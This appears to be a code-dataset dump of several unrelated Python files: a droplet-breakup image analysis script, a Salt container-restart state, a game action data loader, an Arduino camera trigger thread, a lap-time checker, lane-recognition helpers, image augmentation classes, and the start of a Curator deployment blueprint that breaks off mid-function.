\n\nintns_scale = 100.\npix_scale = 2.\ngrad_scale = (intns_scale/pix_scale)**2\n\n#bg = backlight.construct_bg_image(c,frames=np.arange(len(c)-50,len(c)))\nbg = np.zeros_like(c[0])+250.\nbg = bg.astype(float)\n#crop_lims = [int(meta['top']),int(meta['bottom']),int(meta['left']),int(meta['right'])]\n\n \nbu_subpix = pinchoff.BreakupTrackedInfo(folder,cine_name,meta['breakup_frame'],meta['crop_lims'],bg,meta['dx'],1./meta['fps'])\n\ndef bgsub(f): return c[f].astype(float)-bg\n\nf = meta['breakup_frame']-1\n\n#points_chosen_res = []\n#dist_res = []\nd_frames = (np.unique(np.geomspace(1,400,250,dtype=int))*-1) # np.flipud( # 1,500,300\nimport pickle\n#bu = pickle.load(open(folder+meta['case_name']+r'_breakupInfo.pkl'))\n#d_frames = bu.d_frames\n#d_frames = np.arange(-1,-10,-1)\nf_use = f + d_frames\n#bu_subpic\n\nplt.figure(figsize=(12,9))\nplt.imshow(bu_subpix.get_im_rel_breakup(d_frames[0],c=c),cmap='viridis')\ncenter_point = np.flipud(plt.ginput(1,timeout=-1)[0])\n#center_point = np.array([211.,279.])\n#center_point = np.array([115,153])\nr_max_search = 20\n\n# get the angular separation between points\nprint('...getting the angular separation')\nn_theta = 1001\ntheta_vec = np.linspace(0,2*np.pi,n_theta)\ntheta0,theta1 = np.meshgrid(theta_vec,theta_vec)\nd_theta = np.min(np.abs([theta0-theta1,theta0-theta1+2*np.pi,theta0-theta1-2*np.pi]),axis=0)\n\npoints_chosen_res = []\ndist_res = []\ncontours = []\nL_c = []\nmajor = []\nminor = []\nlargest_dist = []\nlargest_dist_from_neck = []\narea = []\ndf_split = []\nnormal_res = []\n\nn_regions_leave = 2 # how many background regions to leave in each image\n \ntheta_target = None\nfor df in d_frames:\n \n print('df = '+str(df))\n \n if df<-10:\n thresh=0\n \n im = bu_subpix.get_im_rel_breakup(df,c=c)\n #im[im>100] = im[im>100]*-1\n #im[:100,:] = -200\n \n print('...getting the region props') \n filled = backlight.get_filled(im,thresh,filter_size=1)\n props = backlight.filled2regionpropsdf(filled,g=None,min_area=0,frame=None)\n ix_use = props['filled_area'].idxmax()\n props = props.loc[ix_use] # only need the region with the largest area\n major.append(props['major_axis_length'])\n minor.append(props['minor_axis_length'])\n area.append(props['filled_area'])\n \n '''\n As an initial guess, use the old method to get the neck\n ''' \n contour = 
pinchoff.get_contour(scipy.ndimage.filters.gaussian_filter(im,.2,mode='reflect'),ax=None,thresh=thresh,n_regions_leave=n_regions_leave)\n contours.append(contour.copy())\n dist,neck_points = pinchoff.get_neck(contour,np.shape(im),target_loc=center_point,target_dist=r_max_search)\n r_max_search = np.max([dist*1,20]) # updating for the next time\n neck_points=np.array(neck_points)\n theta_target = np.arctan2(neck_points[1,0]-neck_points[0,0],neck_points[1,1]-neck_points[0,1])%np.pi\n center_point = np.nanmean(neck_points,axis=0)\n center_before = center_point.copy()\n largest_dist.append(np.max(scipy.spatial.distance.cdist(contour,contour)))\n \n n_parallel_shift = 3\n \n shift_dists = []\n shift_points = []\n #normal = pinchoff.get_neck_normal(contour,neck_points,n_neighbors=round(dist))\n if dist<100:\n normal=np.arctan2(neck_points[1,0]-neck_points[0,0],neck_points[1,1]-neck_points[0,1])\n else:\n normal = pinchoff.get_neck_normal(contour,neck_points,n_neighbors=min(round(dist/2),10))\n normal_res.append(normal)\n parallel = normal-np.pi/2.\n border_grad = pinchoff.make_border_grad(im,fill_thresh=thresh,template_radius=3,n_regions_leave=n_regions_leave,orientation=None)\n theta_limit = 0.1\n \n fig,axs = plt.subplots(1,2,figsize=(13,9),sharex=True,sharey=True)\n [ax.clear() for ax in axs]\n axs[1].imshow(border_grad)\n axs[0].imshow(im,cmap='gray')\n \n for parallel_shift in range(-1*n_parallel_shift,n_parallel_shift+1):\n center_point = np.mean(neck_points,axis=0) + np.array([np.sin(parallel),np.cos(parallel)])*float(parallel_shift)\n ax.plot(center_point[1],center_point[0],'^',color='magenta')\n points = pinchoff.get_contour_points(border_grad,center_point,theta_vec,target_dist=dist,theta_target=theta_target,theta_limit=theta_limit) \n dist,points_chosen = pinchoff.get_neck_gradientMethod(points,center_point,d_theta,d_theta_limit=np.pi/2.)\n shift_dists.append(dist)\n shift_points.append(points_chosen)\n ix_choose = np.nanargmin(shift_dists)\n print('ix_choose = '+str(ix_choose))\n dist = shift_dists[ix_choose]\n points_chosen = shift_points[ix_choose]\n\n #plt.close('all')\n \n for ax in axs:\n ax.plot(contour[:,1],contour[:,0],color='g',lw=1)\n ax.plot(neck_points[:,1],neck_points[:,0],'x-',color='orange') \n ax.plot(center_point[1],center_point[0],'o',color='magenta')\n if theta_target is not None:\n line_len = r_max_search\n ax.plot([center_point[1]+line_len*np.cos(theta_target),center_point[1]-line_len*np.cos(theta_target)],[center_point[0]+line_len*np.sin(theta_target),center_point[0]-line_len*np.sin(theta_target)],color='magenta')\n ax.plot([center_point[1]+line_len*np.cos(theta_target+theta_limit),center_point[1]-line_len*np.cos(theta_target+theta_limit)],[center_point[0]+line_len*np.sin(theta_target+theta_limit),center_point[0]-line_len*np.sin(theta_target+theta_limit)],'--',color='magenta')\n ax.plot([center_point[1]+line_len*np.cos(theta_target-theta_limit),center_point[1]-line_len*np.cos(theta_target-theta_limit)],[center_point[0]+line_len*np.sin(theta_target-theta_limit),center_point[0]-line_len*np.sin(theta_target-theta_limit)],'--',color='magenta')\n \n for ax in axs:\n ax.plot(points[:,1],points[:,0],'.',color='r',alpha=0.5)\n ax.plot(points_chosen[:,1],points_chosen[:,0],'o-',color='cyan')\n \n L_c_thisFrame,intersection_points = pinchoff.get_Lc(contour,points_chosen,ax=ax)\n\n dist_res.append(dist)\n points_chosen_res.append(points_chosen) \n L_c.append(L_c_thisFrame)\n\n fig.suptitle('df = '+str(df))\n\n plt.show()\n plt.pause(0.1)\n #stophere\n #if df<-50:\n # 
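(an intentionally undefined name, used as a crude manual breakpoint) 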
stophere\n print('---------------------------------')\n \n \n \nother_params = {'major':np.array(major),'minor':np.array(minor),'largest_dist':np.array(largest_dist),'largest_dist_from_neck':np.array(largest_dist_from_neck),'L_c':np.array(L_c),'area':np.array(area),'df_split':df_split}\nbu_subpix.enter_data(contours,points_chosen_res,dist_res,d_frames,L_c=L_c,other_params=other_params) \n#other_params = {'major':np.array(major),'minor':np.array(minor),'largest_dist':np.array(largest_dist),'largest_dist_from_neck':np.array(largest_dist_from_neck),'L_c':np.array(L_c),'area':np.array(area),'df_split':df_split}\n#bu_subpix.enter_data(contours,points_chosen_res,dist_res,d_frames) \npickle.dump(bu_subpix,open(folder+cine_name+'_breakupInfo.pkl','wb'))\n \ndist_res = np.array(dist_res)\nplt.figure()\nplt.loglog(((f_use[:len(dist_res)]-meta['breakup_frame'])*-1-1)/meta['fps'],dist_res*meta['dx'],'-x')\nplt.loglog(bu.t*-1,bu.dists_m,'-x')\ndist_min = bu.dists_m.copy()-bu.dx*2\ndist_min[dist_min<=1e-5] = 1e-5\nplt.fill_between(bu.t*-1,bu.dists_m+bu.dx*2,dist_min,color='orange',alpha=0.2)\n\nif False:\n pickle.dump(bu_subpix,open(folder+cine_name+'_breakupInfo_subpix.pkl','wb'))\n\n\n# get the mean position of each combination of points and the value of the eroded image at this point\n#mean_pos = np.zeros((n_theta,n_theta,2))\n#center_bin_value = np.zeros((n_theta,n_theta))\n#x_vec = np.arange(0,np.shape(im)[1])\n#y_vec = np.arange(0,np.shape(im)[0])\n#bin_interp = interp2d(x_vec,y_vec,eroded.astype(float))\n#for ti1 in range(n_theta):\n# for ti2 in range(n_theta):\n# mean_pos[ti1,ti2,:] = np.mean([points[ti1,:],points[ti2,:]],axis=0)\n# #if np.isnan(mean_pos[ti1,ti2,0])==False:\n# # print(mean_pos[ti1,ti2,1])\n# # ax.plot(mean_pos[ti1,ti2,1],mean_pos[ti1,ti2,0],'x',color=[0,1,0],alpha=0.5)\n# center_bin_value[ti1,ti2] = bin_interp(mean_pos[ti1,ti2,1],mean_pos[ti1,ti2,0])\n#\n\n#@dist = dist_points(points[amin[0]],points[amin[1]])","sub_path":"scripts/subpix_normal_test.py","file_name":"subpix_normal_test.py","file_ext":"py","file_size_in_byte":8740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"534816054","text":"from __future__ import absolute_import\n\n\ndef stop_container_and_wait(name, namespace, timeout=60, **kwargs):\n '''\n Stop the running container named ``name`` running inside of\n the specified ``namespace``.\n\n Then waits for kubelet to bring up a new instance of the same\n container.\n\n name\n Name of the container. This is checked against the ``metadata.name``\n field of a kubernetes pod.\n\n namespace\n Name of the namespace to search the container inside.\n\n timeout\n If the container has not been restarted after timeout seconds, return\n with a failure.\n\n By default a 60 seconds timeout is applied.\n\n .. code-block:: yaml\n\n kube_system_haproxy:\n caasp_cri.stop_container_and_wait:\n name: haproxy\n namespace: kube-system\n timeout: 120\n '''\n\n stopped = __salt__['caasp_cri.stop_container'](name, namespace, **kwargs)\n\n if not stopped:\n __utils__['caasp_log.debug']('CaaS: {namespace}.{name} container was not found running'.format(\n namespace=namespace,\n name=name))\n\n return wait_for_container(name, namespace, timeout, **kwargs)\n\n\ndef wait_for_container(name, namespace, timeout=60, **kwargs):\n '''\n Wait for a container to be up and running.\n\n name\n Name of the container. 
This is checked against the ``metadata.name``\n field of a kubernetes pod.\n\n namespace\n Name of the namespace to search the container inside.\n\n timeout\n If the container is not running after ``timeout`` seconds, return\n with a failure.\n\n By default a 60 seconds timeout is applied.\n\n .. code-block:: yaml\n\n kube_system_haproxy:\n caasp_cri.wait_for_container:\n name: haproxy\n namespace: kube-system\n timeout: 120\n '''\n\n ret = {'name': name,\n 'namespace': namespace,\n 'changes': {},\n 'result': False,\n 'comment': ''}\n\n running = __salt__['caasp_cri.wait_for_container'](name,\n namespace,\n timeout,\n **kwargs)\n\n if running:\n ret['result'] = True\n ret['comment'] = '{namespace}.{container} successfully restarted'.format(\n namespace=namespace,\n container=name\n )\n else:\n ret['comment'] = '{namespace}.{container} was not restarted by kubelet within the given time'.format(\n namespace=namespace,\n container=name)\n\n return ret\n","sub_path":"salt/_states/caasp_cri.py","file_name":"caasp_cri.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"481716209","text":"import json\nimport os\nfrom loader.Database import DBManager, DBTableMetadata\nfrom enum import Enum\nimport re\n\nclass CommandType(Enum):\n UNKNOWN = -1\n PARTS_MOTION = 2\n MOVEMENT = 5\n ROTATION = 7\n MARKER = 8\n BULLET = 9\n HIT = 10\n EFFECT = 11\n SOUND = 12\n CAMERA_MOTION = 13\n SEND_SIGNAL = 14\n ACTIVE_CANCEL = 15\n TARGETING = 17 # spin cancel ?\n ACTION_END = 23\n MULTI_BULLET = 24\n ANIMATION = 25 # or maybe effects ?\n CONTROL = 30 # some kinda control related thing\n COLLISION = 37 # seen in arrange bullet\n PARABOLA_BULLET = 41\n TIMESTOP = 48 # control animation playback ?\n TIMECURVE = 49 # control animation playback ?\n PIVOT_BULLET = 53\n MOVEMENT_IN_SKILL = 54 # only eze s1 uses this\n ROTATION_IN_SKILL = 55\n FIRE_STOCK_BULLET = 59\n CONDITION_TEXT = 63 # unsure where text is sourced, not in TextLabel\n SETTING_HIT = 66\n EFFECT_MM1 = 100 # megaman stuff\n EFFECT_MM2 = 101 # megaman stuff\n CHANGE_MODE = 108 # megaman stuff\n SHADER = 101\n ADD_HIT = 105\n ACTION_CONDITON = 111\n\n @classmethod\n def _missing_(cls, value):\n return cls.UNKNOWN\n\n\ndef build_db_data(meta, ref, seq, data):\n db_data = {}\n for k in meta.field_type.keys():\n if k in data:\n if isinstance(data[k], str):\n db_data[k] = data[k].strip()\n else:\n db_data[k] = data[k]\n else:\n db_data[k] = None\n db_data['_Id'] = f'{ref}{seq:03}'\n db_data['_ref'] = int(ref)\n db_data['_seq'] = seq\n return db_data\n\n\ndef build_bullet(meta, ref, seq, data):\n db_data = build_db_data(meta, ref, seq, data)\n ab_label = data['_arrangeBullet']['_abHitAttrLabel']\n if ab_label:\n db_data['_abHitAttrLabel'] = ab_label\n return db_data\n\n\ndef build_marker(meta, ref, seq, data):\n db_data = build_db_data(meta, ref, seq, data)\n charge_lvl_sec = db_data['_chargeLvSec']\n if not any(charge_lvl_sec):\n db_data['_chargeLvSec'] = None\n return db_data\n\ndef build_animation(meta, ref, seq, data):\n db_data = build_db_data(meta, ref, seq, data)\n if '_name' in data and data['_name']:\n db_data['_animationName'] = data['_name']\n return db_data\n\nACTION_PART = DBTableMetadata(\n 'ActionParts', pk='_Id', field_type={\n '_Id': DBTableMetadata.INT+DBTableMetadata.PK,\n '_ref': DBTableMetadata.INT,\n '_seq': DBTableMetadata.INT,\n '_seconds': DBTableMetadata.REAL,\n '_speed': DBTableMetadata.REAL,\n '_duration': DBTableMetadata.REAL,\n 
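# shared per-part fields; the command-specific column groups are labeled below\n 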
'_activateId': DBTableMetadata.INT,\n\n 'commandType': DBTableMetadata.INT,\n\n # PARTS_MOTION\n '_motionState': DBTableMetadata.TEXT,\n '_motionFrame': DBTableMetadata.INT,\n '_blendDuration': DBTableMetadata.REAL,\n '_isBlend': DBTableMetadata.INT,\n '_isEndSyncMotion': DBTableMetadata.INT,\n '_isIgnoreFinishCondition': DBTableMetadata.INT,\n '_isIdleAfterCancel': DBTableMetadata.INT,\n\n # MOVEMENT\n # '_position': DBTableMetadata.BLOB,\n # '_pushOut': DBTableMetadata.INT,\n # '_autoDash': DBTableMetadata.INT,\n # '_chargeMarker': DBTableMetadata.INT,\n # '_gravity': DBTableMetadata.REAL,\n # '_moveStyle': DBTableMetadata.INT,\n # '_teleportPosition': DBTableMetadata.INT,\n # '_teleportDirection': DBTableMetadata.INT,\n # '_distance': DBTableMetadata.INT,\n\n # ROTATION\n # '_rotation': DBTableMetadata.BLOB,\n\n # MARKER\n '_chargeSec': DBTableMetadata.REAL,\n '_chargeLvSec': DBTableMetadata.BLOB,\n # '_chargeAfterSec': DBTableMetadata.REAL,\n # '_ignoredByPlayerAI': DBTableMetadata.INT,\n # '_invisibleForPlayerAI': DBTableMetadata.INT,\n # '_playerAIEscapeDir': DBTableMetadata.INT,\n # '_ignoredImpactWaitForPlayerColor': DBTableMetadata.INT,\n\n # HIT/BULLET\n '_bulletSpeed': DBTableMetadata.REAL,\n '_delayTime': DBTableMetadata.REAL,\n '_collisionHitInterval': DBTableMetadata.REAL,\n '_isHitDelete': DBTableMetadata.INT,\n '_hitLabel': DBTableMetadata.TEXT,\n '_hitAttrLabel': DBTableMetadata.TEXT,\n '_abHitAttrLabel': DBTableMetadata.TEXT,\n '_bulletNum': DBTableMetadata.INT,\n '_generateNum': DBTableMetadata.INT,\n '_generateDelay': DBTableMetadata.REAL,\n '_lifetime': DBTableMetadata.REAL,\n\n # SEND_SIGNAL\n '_signalType': DBTableMetadata.INT,\n '_decoId': DBTableMetadata.INT,\n '_actionId': DBTableMetadata.INT,\n '_keepActionEnd': DBTableMetadata.INT,\n '_keepActionId1': DBTableMetadata.INT,\n '_keepActionId2': DBTableMetadata.INT,\n\n # ACTIVE_CANCEL\n '_actionType': DBTableMetadata.INT,\n '_motionEnd': DBTableMetadata.INT,\n\n # BULLETS - contains marker data, unsure if it does anything\n # '_useMarker': DBTableMetadata.INT,\n # '_marker': DBTableMetadata.BOLB (?)\n\n # ANIMATION\n '_animationName': DBTableMetadata.TEXT, \n '_isVisible': DBTableMetadata.INT, \n '_isActionClear': DBTableMetadata.INT,\n\n # ACTION_CONDITON\n '_actionConditionId': DBTableMetadata.INT,\n }\n)\n\nPROCESSORS = {}\nPROCESSORS[CommandType.PARTS_MOTION] = build_db_data\nPROCESSORS[CommandType.MARKER] = build_marker\nPROCESSORS[CommandType.BULLET] = build_bullet\nPROCESSORS[CommandType.HIT] = build_db_data\nPROCESSORS[CommandType.SEND_SIGNAL] = build_db_data\nPROCESSORS[CommandType.ACTIVE_CANCEL] = build_db_data\nPROCESSORS[CommandType.MULTI_BULLET] = build_bullet\nPROCESSORS[CommandType.ANIMATION] = build_animation\nPROCESSORS[CommandType.PARABOLA_BULLET] = build_bullet\nPROCESSORS[CommandType.PIVOT_BULLET] = build_bullet\nPROCESSORS[CommandType.FIRE_STOCK_BULLET] = build_bullet\nPROCESSORS[CommandType.SETTING_HIT] = build_db_data\nPROCESSORS[CommandType.ADD_HIT] = build_db_data\nPROCESSORS[CommandType.ACTION_CONDITON] = build_db_data\n\ndef load_actions(db, path):\n file_filter = re.compile(r'PlayerAction_([0-9]+)\\.json')\n db.drop_table(ACTION_PART.name)\n db.create_table(ACTION_PART)\n sorted_data = []\n for root, _, files in os.walk(path):\n for file_name in files:\n if file_name == 'ActionPartsList.json':\n table = 'ActionPartsList'\n db.drop_table(table)\n with open(os.path.join(root, file_name)) as f:\n raw = json.load(f)\n for r in raw:\n resource_fn = os.path.basename(r['_resourcePath'])\n 
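# resource basenames are expected to look like HOST_ID; anything else falls back to (None, 0) below\n 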
try:\n r['_host'], r['_Id'] = resource_fn.split('_')\n r['_Id'] = int(r['_Id'])\n except:\n r['_host'], r['_Id'] = None, 0\n row = next(iter(raw))\n pk = '_resourcePath'\n meta = DBTableMetadata(table, pk=pk)\n meta.init_from_row(row)\n db.create_table(meta)\n db.insert_many(table, raw)\n else:\n res = file_filter.match(file_name)\n if res:\n ref = res.group(1)\n with open(os.path.join(root, file_name)) as f:\n raw = json.load(f)\n action = [gameObject['_data'] for gameObject in raw if '_data' in gameObject.keys()]\n for seq, data in enumerate(action):\n command_type = CommandType(data['commandType'])\n if command_type in PROCESSORS.keys():\n builder = PROCESSORS[command_type]\n db_data = builder(ACTION_PART, ref, seq, data)\n sorted_data.append(db_data)\n db.insert_many(ACTION_PART.name, sorted_data)\n\nif __name__ == '__main__':\n from loader.Database import DBManager\n db = DBManager()\n load_actions(db, './extract/actions')","sub_path":"loader/Actions.py","file_name":"Actions.py","file_ext":"py","file_size_in_byte":8037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"445366000","text":"from PySide2.QtCore import QThread, Signal, Slot\nfrom devices.ardunio import Ardunio\nimport io\n#import RPi.GPIO as GPIO\n\nclass TriggerThread(QThread):\n trigger = Signal(bool)\n def __init__(self, port):\n QThread.__init__(self)\n print(\"Starting thread\")\n self.run_thread = True\n self.ardunio = Ardunio(port)\n\n #self._gpio_setup()\n \n\n def __del__(self):\n print(\"closing thread\") \n self.run_thread = False\n self.wait()\n\n def run(self): \n while self.run_thread:\n self.ardunio.wait_for_trigger()\n self.msleep(30)\n self.trigger_photo()\n\n\n def trigger_photo(self):\n self.ardunio.send(b'T')\n self.trigger.emit(True)\n self.ardunio.send(b'F')\n\n\n\n \"\"\"def _gpio_setup(self):\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(23, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n GPIO.add_event_detect(23, GPIO.FALLING, callback=self.gpio_trigger_callback, bouncetime=300) \n\n \n def gpio_trigger_callback(self, channel):\n self.trigger_photo()\n\n\n def wait_for_gpio_pin(self):\n GPIO.wait_for_edge(23, GPIO.RISING) \"\"\"","sub_path":"trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"369110326","text":"__author__ = 'Michiel Van den Berghe'\r\nimport statfunc\r\nimport time\r\n\r\nimport api\r\n\r\nclass History:\r\n warningDeviation = 0\r\n def __init__(self):\r\n self.lastUpdate = 0\r\n self.histories = {}\r\n\r\n def updateHistory(self, timestamp, data):\r\n self.lastUpdate = timestamp\r\n for stick, history in data.items():\r\n if stick not in self.histories:\r\n self.histories[stick] = StickHistory(stick)\r\n self.histories[stick].updateHistory(timestamp, history)\r\n\r\n def getWarnings(self):\r\n warnings = {}\r\n for stick, history in self.histories.items():\r\n dev, expected, stddev, lastLap = history.getDeviation()\r\n if dev > self.warningDeviation:\r\n warnings[stick] = (dev, expected, stddev, lastLap)\r\n return warnings\r\n\r\n def lastUpdated(self):\r\n return self.lastUpdate\r\n\r\nclass StickHistory:\r\n historySize = 10\r\n def __init__(self, stick):\r\n self.stick = stick\r\n self.history = []\r\n self.lastUpdate = 0\r\n\r\n def updateHistory(self, timestamp, laps):\r\n self.lastUpdate = timestamp\r\n self.history.extend(laps)\r\n self.history = self.history[-self.historySize:]\r\n\r\n def 
getLastLap(self):\r\n return self.history[-1]\r\n\r\n def getLapTimes(self):\r\n return statfunc.diff(self.history)\r\n\r\n def getDeviation(self):\r\n laptimes = self.getLapTimes()\r\n stdev = statfunc.stdev(laptimes)\r\n avgLap = statfunc.avg(laptimes)\r\n lastLap = self.getLastLap()\r\n # deviation, expected, stddev, lastLap\r\n return (self.lastUpdate - lastLap - avgLap) / stdev, lastLap + avgLap, stdev, lastLap\r\n\r\n\r\nclass HistoryUpdater:\r\n def __init__(self, history, fetcher, interval):\r\n self.history = history\r\n self.fetcher = fetcher\r\n self.interval = interval\r\n self.running = True\r\n\r\n def start(self):\r\n print(\"Statchecker running...\")\r\n while self.running:\r\n print(\"Updating %s...\" % time.ctime())\r\n timestamp, data = self.fetcher.getHistory(self.history.lastUpdated())\r\n time.sleep(self.interval)\r\n self.history.updateHistory(timestamp, data)\r\n for team, info in self.history.getWarnings().items():\r\n dev, expected, stddev, lastLap = info\r\n print(\"Warning: %s is %f standard deviations (%f) too late. Last lap: %s\" % (team, dev, stddev, time.ctime(lastLap)))\r\n print(\"Updated %s\" % time.ctime(timestamp))\r\n\r\n def stop(self):\r\n self.running = False\r\n\r\n\r\nif __name__ == '__main__':\r\n updater = HistoryUpdater(History(), api.HistoryFetcher(api.url), 10)\r\n updater.start()","sub_path":"tools/data-analysis/laps.py","file_name":"laps.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"187708585","text":"# File for useful functions in the context of lane recognition\n\nimport cv2 as cv\nimport os\n\n\ndef show_image(img_path):\n \"\"\"\n\n :param img_path: Image's absolute path: /.../image.png\n :return: Window showing the requested image. Press any key to close it\n \"\"\"\n\n img = cv.imread(filename=img_path)\n\n show_image_temp(img=img)\n\n\ndef show_image_temp(img):\n \"\"\"\n\n :param img:\n :return:\n \"\"\"\n # Create a visualization window\n # CV_WINDOW_AUTOSIZE : window size will depend on image size\n cv.namedWindow(\"Display window\", cv.WINDOW_AUTOSIZE)\n\n # Show the image\n cv.imshow(\"Display window\", img)\n\n # Wait\n cv.waitKey(0)\n\n # Destroy the window -- might be omitted\n cv.destroyWindow(\"Display window\")\n\n\ndef get_abs_path(rel_path: str, is_dir: bool = False):\n \"\"\"\n\n :param rel_path: relative path\n :param is_dir:\n :return:\n \"\"\"\n\n path = os.path.realpath(rel_path)\n\n assert os.path.exists(path), \"File does not exist in specified path!\"\n assert not is_dir or os.path.isdir(path), \"Expected directory, got file\"\n\n return path\n\n\nif __name__ == '__main__':\n # Testing, maybe...\n ...\n","sub_path":"Lane_Recognition/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"271791346","text":"import numpy as np\nimport tensorflow\n\n\nclass Copyout:\n \"\"\"\n Copyout class for image augmentation.\n\n Attributes\n ----------\n extent : int\n Extent of the square patch. Must be > 0.\n image_buffer_size : int\n Buffer size where images are stored. 
Must be > 0, default is 128.\n \"\"\"\n\n def __init__(self, extent, image_buffer_size=128):\n if not extent > 0:\n raise ValueError('\"extent\" must be > 0')\n\n if not image_buffer_size > 0:\n raise ValueError('\"image_buffer_size\" must be > 0')\n\n self._extent = extent\n self._image_buffer_size = image_buffer_size\n self._image_buffer = []\n\n def __call__(self, img):\n \"\"\"\n Augment a given image with Copyout.\n\n Parameters\n ----------\n img : numpy tensor with rank 3\n the image\n\n Returns\n -------\n numpy tensor with rank 3\n the augmented image\n \"\"\"\n h, w, _ = img.shape\n\n x = np.random.randint(w)\n y = np.random.randint(h)\n\n x1 = np.clip(x - self._extent // 2, 0, w)\n x2 = np.clip(x + self._extent // 2, 0, w)\n y1 = np.clip(y - self._extent // 2, 0, h)\n y2 = np.clip(y + self._extent // 2, 0, h)\n\n copyout_y_size = y2 - y1\n copyout_x_size = x2 - x1\n copyout_y = np.random.randint(h - copyout_y_size)\n copyout_x = np.random.randint(w - copyout_x_size)\n\n image_buffer_len = len(self._image_buffer)\n img_copy = np.copy(img)\n\n # only augment when we have images in the buffer\n # first image will not be augmented\n if image_buffer_len > 0:\n image_buffer_index = np.random.randint(image_buffer_len)\n\n # buffer is full\n if image_buffer_len >= self._image_buffer_size:\n old_img = self._image_buffer.pop(image_buffer_index)\n\n # buffer still needs to be filled\n else:\n old_img = self._image_buffer[image_buffer_index]\n\n # do the copying\n img[y1: y2, x1: x2, :] = old_img[copyout_y: copyout_y + copyout_y_size,\n copyout_x: copyout_x + copyout_x_size,\n :]\n\n # append source image to buffer\n self._image_buffer.append(img_copy)\n\n return img\n\n\n# TODO maybe add SamplePairing and Cutout implementations later\n\n\nclass CopyPairing(tensorflow.keras.callbacks.Callback):\n\n def __init__(self, extent,\n warmup_epochs, fine_tuning_epoch,\n coo_epochs=1, cop_epochs=1,\n image_buffer_size=128):\n super().__init__()\n\n if not extent > 0:\n raise ValueError('\"extent\" must be > 0')\n\n if not warmup_epochs >= 0:\n raise ValueError('\"warmup_epochs\" must be >= 0')\n\n if not fine_tuning_epoch > 0:\n raise ValueError('\"fine_tuning_epoch\" must be > 0')\n\n # TODO maybe check if warmup_epochs < fine_tuning_epoch or something\n\n if not coo_epochs > 0:\n raise ValueError('\"coo_epochs\" must be > 0')\n\n if not cop_epochs > 0:\n raise ValueError('\"cop_epochs\" must be > 0')\n\n if not image_buffer_size > 0:\n raise ValueError('\"image_buffer_size\" must be > 0')\n\n self._extent = extent\n self._warmup_epochs = warmup_epochs\n self._fine_tuning_epoch = fine_tuning_epoch\n self._coo_epochs = coo_epochs\n self._cop_epochs = cop_epochs\n self._image_buffer_size = image_buffer_size\n\n self._image_buffer = []\n self._coo_count = 0\n self._cop_count = 0\n self._current_epoch = 0\n\n def copyout(self, img, old_img):\n h, w, _ = img.shape\n\n x = np.random.randint(w)\n y = np.random.randint(h)\n\n x1 = np.clip(x - self._extent // 2, 0, w)\n x2 = np.clip(x + self._extent // 2, 0, w)\n y1 = np.clip(y - self._extent // 2, 0, h)\n y2 = np.clip(y + self._extent // 2, 0, h)\n\n copyout_y_size = y2 - y1\n copyout_x_size = x2 - x1\n copyout_y = np.random.randint(h - copyout_y_size)\n copyout_x = np.random.randint(w - copyout_x_size)\n\n # do the copying\n img[y1: y2, x1: x2, :] = old_img[copyout_y: copyout_y + copyout_y_size,\n copyout_x: copyout_x + copyout_x_size,\n :]\n\n return img\n\n def __call__(self, img):\n image_buffer_len = len(self._image_buffer)\n img_copy = 
\n def __call__(self, img):\n image_buffer_len = len(self._image_buffer)\n img_copy = np.copy(img)\n\n # only augment when we have images in the buffer\n # first image will not be augmented\n if image_buffer_len > 0:\n image_buffer_index = np.random.randint(image_buffer_len)\n if image_buffer_len >= self._image_buffer_size:\n old_img = self._image_buffer.pop(image_buffer_index)\n else:\n old_img = self._image_buffer[image_buffer_index]\n if self._current_epoch < self._warmup_epochs:\n # Copyout\n img = self.copyout(img, old_img)\n elif self._current_epoch > self._fine_tuning_epoch - 2:\n # Copyout\n img = self.copyout(img, old_img)\n else:\n if self._coo_count <= self._coo_epochs - 1:\n # Copyout\n img = self.copyout(img, old_img)\n self._coo_count += 1\n elif self._cop_count <= self._cop_epochs - 1:\n # SamplePairing\n img = np.mean(np.array([img, old_img]), axis=0)\n\n self._cop_count += 1\n if self._cop_count > self._cop_epochs - 1:\n self._coo_count = 0\n self._cop_count = 0\n\n self._image_buffer.append(img_copy)\n\n return img\n\n # TODO test if *args is ok\n def on_epoch_begin(self, epoch, *args):\n self._current_epoch = epoch\n
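\n\n# Usage sketch (assumption: a Keras ImageDataGenerator pipeline; 'datagen',\n# 'model', 'x_train' and 'y_train' are illustrative names, not part of this\n# module):\n#\n# cop = CopyPairing(extent=16, warmup_epochs=5, fine_tuning_epoch=90)\n# datagen = tensorflow.keras.preprocessing.image.ImageDataGenerator(\n# preprocessing_function=cop)\n# model.fit(datagen.flow(x_train, y_train), callbacks=[cop], epochs=100)\n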
","sub_path":"coocop/coocop.py","file_name":"coocop.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"297927383","text":"\"\"\"\nCurator Blueprint\n=======================\n\n**Fabric environment:**\n\n.. code-block:: yaml\n\n blueprints:\n - blues.curator\n\n settings:\n curator:\n # branch: 5 # Major Version of curator (default: 5)\n # version: latest # Specific version of curator to install\n\n timeout: 60 # Default action timeout\n\n es_hosts: # ES Server(s) (Default: localhost)\n - localhost\n\n actions:\n delete:\n some-index: 7 # index_prefix: days_to_keep\n\n\"\"\"\nimport yaml\n\nfrom fabric.decorators import task\n\nfrom refabric.api import info\nfrom refabric.context_managers import sudo\nfrom refabric.contrib import blueprints\n\nfrom . import debian\n\n__all__ = ['setup', 'configure']\n\n\nblueprint = blueprints.get(__name__)\n\n\n@task\ndef setup():\n \"\"\"\n Install Curator\n \"\"\"\n install()\n configure()\n\n\ndef install():\n with sudo():\n branch = blueprint.get('branch', '5')\n info('Adding apt repository for {} branch {}', 'curator', branch)\n\n repository = 'https://packages.elastic.co/curator/{}/debian stable main'.format(branch)\n 